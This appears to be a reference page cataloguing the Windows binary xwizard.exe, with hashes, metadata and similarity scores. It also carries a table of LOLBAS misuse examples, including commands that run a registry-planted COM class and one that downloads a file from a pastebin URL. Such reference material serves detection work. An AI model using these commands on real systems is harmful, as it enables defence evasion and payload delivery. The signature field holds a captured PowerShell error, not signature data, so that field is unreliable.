xwizard.exe

  • File Path: C:\windows\system32\xwizard.exe
  • Description: Extensible Wizards Host Process

Hashes

Type Hash
MD5 2AFA70B713D8AF4279C9FDAE7AD08A9D
SHA1 4D3CE11E2053ECAE7094B25E94CE6530F22D92BF
SHA256 1FF04F65E3E09B6F960AED6C7A88C51FEE58ABC37D05848F4248CE409B018741
SHA384 14960C498BF8CBEECB384DEC66E13417C836C9424CA6A915A8330AEFFD75C6010ACDC180627B0ED3DE4997BC300E3EAF
SHA512 89C1B99789ECD205C5D963697B22CECE4E043E7BFAE10F68CEF36FE1237FE9A85F1E2D2E24CF5E1089D1B552027D9CEA16500241EEBE85875E9FC8EEEEBC7CE9
SSDEEP 1536:MhvOmwbTRLqt2Mb9zi6l5URDoq4OZZZLlCIib:6beLqt2Mxzi6l2RD68wb

Signature

  • Status: The file C:\windows\system32\xwizard.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
  • Serial: ``
  • Thumbprint: ``
  • Issuer:
  • Subject:

File Metadata

  • Original Filename: xwizard.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 6.3.9600.16384 (winblue_rtm.130821-1623)
  • Product Version: 6.3.9600.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

File Similarity (ssdeep match)

File Score
C:\Windows\system32\ComputerDefaults.exe 54
C:\WINDOWS\system32\ComputerDefaults.exe 49
C:\Windows\system32\ComputerDefaults.exe 52
C:\windows\system32\ComputerDefaults.exe 57
C:\Windows\system32\ComputerDefaults.exe 50
C:\Windows\system32\xwizard.exe 52
C:\Windows\system32\xwizard.exe 46
C:\WINDOWS\system32\xwizard.exe 49
C:\Windows\system32\xwizard.exe 58
C:\windows\SysWOW64\ComputerDefaults.exe 58
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 46
C:\Windows\SysWOW64\ComputerDefaults.exe 57
C:\Windows\SysWOW64\ComputerDefaults.exe 54
C:\Windows\SysWOW64\ComputerDefaults.exe 46
C:\Windows\SysWOW64\xwizard.exe 58
C:\Windows\SysWOW64\xwizard.exe 54
C:\windows\SysWOW64\xwizard.exe 58
C:\Windows\SysWOW64\xwizard.exe 54
C:\WINDOWS\SysWOW64\xwizard.exe 57

Possible Misuse

The following table contains possible examples of xwizard.exe being misused. While xwizard.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
LOLBAS Xwizard.yml Name: Xwizard.exe  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM  
LOLBAS Xwizard.yml Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.  
LOLBAS Xwizard.yml - Path: C:\Windows\System32\xwizard.exe  
LOLBAS Xwizard.yml - Path: C:\Windows\SysWOW64\xwizard.exe  

MIT License. Copyright (c) 2020-2021 Strontic.